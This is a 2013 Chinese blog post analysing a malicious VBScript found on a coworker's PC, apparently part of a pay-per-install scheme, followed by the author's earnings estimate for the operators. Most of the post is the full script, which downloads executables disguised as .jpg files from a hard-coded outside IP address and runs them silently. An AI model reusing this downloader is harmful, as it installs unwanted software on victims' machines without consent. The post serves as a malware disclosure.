分享一个截获到的月入百万病毒营销团伙的代码

事情要从办公室一同事的机子说起。。
某天发现电脑无缘无故被安装了N多垃圾软件,帮他检查发现C盘多了这么多东西。。
<ignore_js_op>QQ图片20130717140341.jpg 
而且还有一个可疑的文件
<ignore_js_op>3.jpg 
打开之后发现如下代码:

本帖隐藏的内容

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/bd.jpg",0  '目测这个是恶意软件的服务器地址,服务器上的文件名是jpg格式
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\Baidusd_OnlineSetup_sid_30084_silent.exe",2  '下载文件时顺便改成exe格式
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0   '运行安装
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/lf.jpg",0   '继续重复上面的操作,下载另一个垃圾软件
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\21230_lf.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\21230_lf.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\setup_open_3354.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\setup_open_3354.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2370.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2370.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\paopao_20.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\paopao_20.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/FX.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\FunshionInstall_C170827.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\FunshionInstall_C170827.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\setup_open_3333.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\setup_open_3333.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2366.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2366.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\paopao_19.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\paopao_19.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2492.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2492.exe", 0
Wscript.Sleep 1000

 

 

 

从上面的下载的软件看,基本上推广的都是安全软件跟多媒体类.一般杀软都不会查杀。所以成功率还是挺高的



上去他们的服务器看了下
<ignore_js_op>4.jpg 
看看他们的下载量,粗略的计算下
下载量约为19万次,按照每个软件5元计算,最早的文件是22号上传的.到现在不到一个月.直接收入接近100万!可见病毒营销是有多牛

T

posted @ 2013-08-06 19:00  17bdw  阅读(243)  评论(0)    收藏  举报